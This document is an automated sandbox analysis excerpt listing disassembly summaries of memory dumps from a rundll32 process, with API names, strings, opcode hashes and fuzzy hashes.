                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_$std::ios_base::_$Ios_base_dtorTidystd::current_exception
                                                                    • String ID: file$function$line$msg$origin$timestamp
                                                                    • API String ID: 3875769080-4102175642
                                                                    • Opcode ID: 461f2c2ad81ed990861590079a5a549b510804d5c2a481b745797e54b5d529a6
                                                                    • Instruction ID: a4ac5d2690f534e228157751a62fd11899c5d64c8a06888c2d3c4aadd8f8ab58
                                                                    • Opcode Fuzzy Hash: 461f2c2ad81ed990861590079a5a549b510804d5c2a481b745797e54b5d529a6
                                                                    • Instruction Fuzzy Hash: 35B18132626A92AADB10EF25EC515ED3360FF413D8F802131FA2E43A99DF39D558C358
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$CloseCreateDeallocateFileHandlestd::_
                                                                    • String ID: AppendProcessNameToPathPrefix$MaxFileCount$MaxFileSize$PathPrefix$WriteThrough
                                                                    • API String ID: 634952362-2621746944
                                                                    • Opcode ID: 4decc1ef81a76709185ad96e1a7e39947b39d8f0209d5821278beaa937307f06
                                                                    • Instruction ID: a96765b41e69bee5f70cc77ad5942a759e78baf53b564563c82dc7501ae2db37
                                                                    • Opcode Fuzzy Hash: 4decc1ef81a76709185ad96e1a7e39947b39d8f0209d5821278beaa937307f06
                                                                    • Instruction Fuzzy Hash: 7681CD32B1AA42AAFB10EB61E8411EC3371FB457D8F802131DE2D57A95DF3D9219C358
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoadResource$ErrorFindFreeLastSizeof
                                                                    • String ID:
                                                                    • API String ID: 1885110938-0
                                                                    • Opcode ID: 5aa32985baf624cca8e7ff9a0fdc72fa29bc6c7aff20572481ecca569b5f52a8
                                                                    • Instruction ID: d10f816a6a5706b13ddd9ea391857e19630a1fef90ccb16b281166ae3a0a036a
                                                                    • Opcode Fuzzy Hash: 5aa32985baf624cca8e7ff9a0fdc72fa29bc6c7aff20572481ecca569b5f52a8
                                                                    • Instruction Fuzzy Hash: 01417731B0EB42A2FB50AB19A44026A73D1FF85BD0F144235DA5E47BA4EF7CE8558B18
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID: after$before$fifth$first$fourth$last$second$third
                                                                    • API String ID: 1323251999-549961694
                                                                    • Opcode ID: 51c0320c9ecd296dbe28aa3bbaaf7859e52e22885190c7b5b4c29b4abe3a7bf4
                                                                    • Instruction ID: 8dd7128a6fdc85f06331599dbd398b3f067d2ff6f5f821c1fadc34f33efbc416
                                                                    • Opcode Fuzzy Hash: 51c0320c9ecd296dbe28aa3bbaaf7859e52e22885190c7b5b4c29b4abe3a7bf4
                                                                    • Instruction Fuzzy Hash: 5A812F32A26622A4FB00FBB5EC514EC2374FF557C8F802535EA1E67AA5DF399508C358
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(?,?,?,00000000,?,?,00000000,00007FF8A8CFFEFA,?,?,00000000,?,00007FF8A8CFF9FF,?,00000000), ref: 00007FF8A8CFEF32
                                                                      • Part of subcall function 00007FF8A8D96700: EnterCriticalSection.KERNEL32 ref: 00007FF8A8D96710
                                                                    • _Init_thread_footer.LIBCMT ref: 00007FF8A8CFEF01
                                                                      • Part of subcall function 00007FF8A8D966A0: EnterCriticalSection.KERNEL32 ref: 00007FF8A8D966B0
                                                                      • Part of subcall function 00007FF8A8D966A0: LeaveCriticalSection.KERNEL32 ref: 00007FF8A8D966F0
                                                                      • Part of subcall function 00007FF8A8CFE0A4: _CxxThrowException.LIBVCRUNTIME ref: 00007FF8A8CFE0C0
                                                                      • Part of subcall function 00007FF8A8CFE0A4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF8A8CFE13B
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Enter$ExceptionInit_thread_footerLeaveThrow_invalid_parameter_noinfolstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 2723823283-0
                                                                    • Opcode ID: b6d218e01d93139bd259be634565b875a9de92124726b052b61462cf44f5c266
                                                                    • Instruction ID: 1b896eaff69a4dd66b83f5f0cf94e246cb251ec7d404070c302f73db3b39a0f6
                                                                    • Opcode Fuzzy Hash: b6d218e01d93139bd259be634565b875a9de92124726b052b61462cf44f5c266
                                                                    • Instruction Fuzzy Hash: 37E1A032A2EB82A5F7A09B15E4403B96361FF847D0F404135DA9D87B94DFBCE845CB28
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleSize$AttributesDeallocatestd::_
                                                                    • String ID:
                                                                    • API String ID: 2266459488-0
                                                                    • Opcode ID: 44d6dd8011be339173400ccdf1f0c6f5fe9cb07d33a31f72547726f31f158f42
                                                                    • Instruction ID: 1fda2e45a8e42df052416b616a0e11273f99dea7dc41f1c029f577e3cfc2c59c
                                                                    • Opcode Fuzzy Hash: 44d6dd8011be339173400ccdf1f0c6f5fe9cb07d33a31f72547726f31f158f42
                                                                    • Instruction Fuzzy Hash: 2CB11332A1AA41A6E710EF25E8905EE3371FB813C4F402035EA6E57E95DF3DE549C714
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 1405656091-0
                                                                    • Opcode ID: 318a314b98ae4d8ed2d993a8be0cd42bcacbb9af60853c6932bb243a02edfb9a
                                                                    • Instruction ID: 4e9413367c869cc8394dd0ce88129a9aaca0203f6adf9d8a330e7c37c3c3a460
                                                                    • Opcode Fuzzy Hash: 318a314b98ae4d8ed2d993a8be0cd42bcacbb9af60853c6932bb243a02edfb9a
                                                                    • Instruction Fuzzy Hash: CE91F6B2F072469BEB588F25C9413B96791EB847C8F049035DA1D8B78AEF3CE8548B54
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 1239891234-0
                                                                    • Opcode ID: 7a8e782dcfe3c76f70ce5210072e5310648d50e5df58fb2ab3501447c95856a4
                                                                    • Instruction ID: 002aad42bedd9c4c4a91c09052ab53bbd93330a47dc0e6a1689d2f1833b94a95
                                                                    • Opcode Fuzzy Hash: 7a8e782dcfe3c76f70ce5210072e5310648d50e5df58fb2ab3501447c95856a4
                                                                    • Instruction Fuzzy Hash: 61319132609F8196DB20DF29E8402AE33A0FB887D8F500135EA9D43B98EF3CD159CB14
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D5ABD0: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D56EB3), ref: 00007FF8A8D5AC8B
                                                                      • Part of subcall function 00007FF8A8D5ABD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D56EB3), ref: 00007FF8A8D5ACCF
                                                                    • RegOpenKeyExW.ADVAPI32 ref: 00007FF8A8D56EFA
                                                                    • RegQueryValueExW.ADVAPI32 ref: 00007FF8A8D56F26
                                                                    • RegCloseKey.ADVAPI32 ref: 00007FF8A8D56F31
                                                                      • Part of subcall function 00007FF8A8D57010: FindResourceExW.KERNEL32 ref: 00007FF8A8D570A9
                                                                      • Part of subcall function 00007FF8A8DC903C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF8A8DC9059
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue$FindOpenResource_invalid_parameter_noinfo
                                                                    • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                    • API String ID: 3908126574-1787575317
                                                                    • Opcode ID: f90eb44e6d66334d976b3e22866244f6b311c03ab069681db9b47509216f6885
                                                                    • Instruction ID: 2444915068196c373d3d40b5bba38584a205a77da589d087b033cbe64dff89e1
                                                                    • Opcode Fuzzy Hash: f90eb44e6d66334d976b3e22866244f6b311c03ab069681db9b47509216f6885
                                                                    • Instruction Fuzzy Hash: F231D532B1AB42E1EB109B24F45576A6360FF857E0F401532EAAD037A5DF3DD109CB18
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D027FC: std::runtime_error::runtime_error.LIBCPMT ref: 00007FF8A8D028D6
                                                                      • Part of subcall function 00007FF8A8D027FC: throw_exception.LIBCPMT ref: 00007FF8A8D028DF
                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FF8A8D0BAA5
                                                                      • Part of subcall function 00007FF8A8D009E0: __std_exception_copy.LIBVCRUNTIME ref: 00007FF8A8D00A12
                                                                      • Part of subcall function 00007FF8A8D12F58: enable_error_info.LIBCPMT ref: 00007FF8A8D12F72
                                                                      • Part of subcall function 00007FF8A8D12F58: _CxxThrowException.LIBVCRUNTIME ref: 00007FF8A8D12F91
                                                                      • Part of subcall function 00007FF8A8D10AAC: throw_exception.LIBCPMT ref: 00007FF8A8D10AC7
                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FF8A8D0BBC8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::invalid_argument::invalid_argumentthrow_exception$ExceptionThrow__std_exception_copyenable_error_infostd::runtime_error::runtime_error
                                                                    • String ID: Cannot convert dates prior to Jan 1, 1970$could not convert calendar time to local time
                                                                    • API String ID: 3961748639-1097574331
                                                                    APIs
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF8A8DB8A13
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 389471666-631824599
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalErrorInitializeLastSection
                                                                    • String ID:
                                                                    • API String ID: 3413597225-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 1286766494-0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $ $ $(
                                                                    • API String ID: 0-3698178323
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateSemaphore$ExceptionThrow
                                                                    • String ID:
                                                                    • API String ID: 1512646613-0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcedure
                                                                    • String ID: $'2O$U/$\8j
                                                                    • API String ID: 3653107232-658286377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $0$@
                                                                    • API String ID: 0-2347541974
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $gfffffff$gfffffff
                                                                    • API String ID: 0-496913188
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise_clrfp
                                                                    • String ID:
                                                                    • API String ID: 15204871-0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )$p
                                                                    • API String ID: 0-1764766951
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: DescriptorSecurity$DaclInitialize
                                                                    • String ID:
                                                                    • API String ID: 625223987-0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcedure
                                                                    • String ID: !yOr
                                                                    • API String ID: 3653107232-2868905794
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID:
                                                                    • API String ID: 1323251999-0
                                                                    • Opcode ID: 22d042ea3a28c32213cb79e8b619b4f295c814ae5b951abea629a08cfbfc3cc7
                                                                    • Instruction ID: 635a45da0097f907fa8ebcc476fb1659bb1fad70ac138dd842c3f7ad9ba09c6b
                                                                    • Opcode Fuzzy Hash: 22d042ea3a28c32213cb79e8b619b4f295c814ae5b951abea629a08cfbfc3cc7
                                                                    • Instruction Fuzzy Hash: C6E1BF22B1AA91A5FB11CB65D0402FD27A0EF54BC8F441131EE9E17B89EF7CE589C324
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: P
                                                                    • API String ID: 0-3110715001
                                                                    • Opcode ID: fc71c7b77c584ab428780ddc863f287b4ad5f6815cb57d0fe849b24e33f4b176
                                                                    • Instruction ID: 1c05d8dc99e1e661a38074126520c80e02b6b26d6a46eba21ed024c878884d89
                                                                    • Opcode Fuzzy Hash: fc71c7b77c584ab428780ddc863f287b4ad5f6815cb57d0fe849b24e33f4b176
                                                                    • Instruction Fuzzy Hash: 1812C630258B489FF774AF69D459BEEB6D2FB88340F51452DA08AC32D2DF78D8418786
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID:
                                                                    • API String ID: 1323251999-0
                                                                    • Opcode ID: 88fd66ed8c93d63684982f8caed945330649921e66e0deda39417e65845a2336
                                                                    • Instruction ID: 35f14ef954ce078a15ed1deadf0d328c11e5240e63fd03e1f29801da1ea8d3ed
                                                                    • Opcode Fuzzy Hash: 88fd66ed8c93d63684982f8caed945330649921e66e0deda39417e65845a2336
                                                                    • Instruction Fuzzy Hash: 65D19122F0A69199FB11CBB5D0012FD63B1EF55B88F444131DE9D27B89DF38E58A8368
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$DeallocateXinvalid_argument
                                                                    • String ID:
                                                                    • API String ID: 1940402478-0
                                                                    • Opcode ID: 6d49e94807b1f179427749f465642f2da799c52822a2ea57ed54f5f7d9566d11
                                                                    • Instruction ID: aa1afd552b27a1d9c8464907b29ad65be902c40fa05d197bf7cb9cb2ec32cc73
                                                                    • Opcode Fuzzy Hash: 6d49e94807b1f179427749f465642f2da799c52822a2ea57ed54f5f7d9566d11
                                                                    • Instruction Fuzzy Hash: 77C11572B1A6C952DF10CB26E8446AEA760FB98BC0F455032EE9D47B85EF3CE009C714
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (
                                                                    • API String ID: 0-3887548279
                                                                    • Opcode ID: f0e7dd1c77ade1b2000a5ea3d18a18395cd9001f657993a855ba74be45576139
                                                                    • Instruction ID: ead2d9d8eafd4a6bc0220aec958e5baeaec9dd1945a0f6f31375da923aa7ad28
                                                                    • Opcode Fuzzy Hash: f0e7dd1c77ade1b2000a5ea3d18a18395cd9001f657993a855ba74be45576139
                                                                    • Instruction Fuzzy Hash: 74F18070E58B489FF7A8DF2A8445BAEB7D2FB88344F50452DE08AC32D1DB34D845974A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: c30bd7ab68d751d74eb6e3fcd089575567a5f3ab528e208d543831b4295961bd
                                                                    • Instruction ID: 5a33167aceb2a6abf259fa16346e3c2dc3ae38b9808ba9ec19159a2bf6deb438
                                                                    • Opcode Fuzzy Hash: c30bd7ab68d751d74eb6e3fcd089575567a5f3ab528e208d543831b4295961bd
                                                                    • Instruction Fuzzy Hash: BDE1B330668B895FF774AB29C486BEEB7D1FB98344F108A2E948AC31D2DA34D4458746
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8
                                                                    • API String ID: 0-4194326291
                                                                    • Opcode ID: a3dc7b8e494b16dd21b97287bb3eaff47006ed4ed7018e253540c91b99ff9934
                                                                    • Instruction ID: d8a1b08f8483ce168d12d0e155a457dafbcc388a607c97a6455a3391a7264470
                                                                    • Opcode Fuzzy Hash: a3dc7b8e494b16dd21b97287bb3eaff47006ed4ed7018e253540c91b99ff9934
                                                                    • Instruction Fuzzy Hash: 41D17330268B485FF764EB29D856BEEB3D2FB88340F50852DA45AC32D2DF74D8458786
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
